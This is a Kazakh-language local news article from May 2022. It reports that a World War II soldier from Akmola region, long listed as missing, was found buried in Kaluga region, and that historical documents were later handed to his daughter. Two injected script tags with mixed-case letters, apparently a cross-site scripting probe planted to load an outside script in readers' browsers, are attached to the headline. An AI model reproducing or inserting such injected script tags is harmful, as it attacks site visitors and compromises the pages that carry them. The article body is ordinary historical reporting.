“Ер есімі ел есінде”<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

09.05.2022

  Ұлы Отан соғысына  Қазақстаннан   бір жарым миллионға жуық адам шақырылды. Олардың 600 мыңнан астамы қайтыс болды, 300 мыңға жуығы хабарсыз кеткен деп саналады.

   Олардың ішінде Ақмола облысы, Куйбышев ауданы, Сарыадыр ауылының тумасы Шәкеев Молдахмет 80 жыл із-түзсіз жоғалғандар тізімінде болған.

     Жүргізілген іздестіру шараларының нәтижесінде тек ғана 2021 жылдың желтоқсан айында  жерлесіміздің Калуга облысы Темкинский ауданы Поляный ауылындағы бауырластар зиратында жерленгені белгілі болды.

  Жеңіс күні қарсаңында  2022 жылғы сап пен  ән облыстық байқауының жеңімпаздары - агротехникалық колледжінің «Жас сарбаз» әскери-патриоттық клубының мүшелері, олардың БӘТД -ның оқытушысы – ұйымдастырушысы А.Т. Битанов және  «Көкше-Іздеу» ВППК - нің жетекшісі   Еркен Абуганифович Абдуллинмен бірлесе даңқты батырдың  Молдахмет Шәкеевтің қызына отбасылық мұрағатына сақтау үшін маңызды тарихи құжаттарды тапсыру  рәсіміне қатысты.

Просмотров: 712


Пікір қосу



Деректерді қолтаңбаға қосу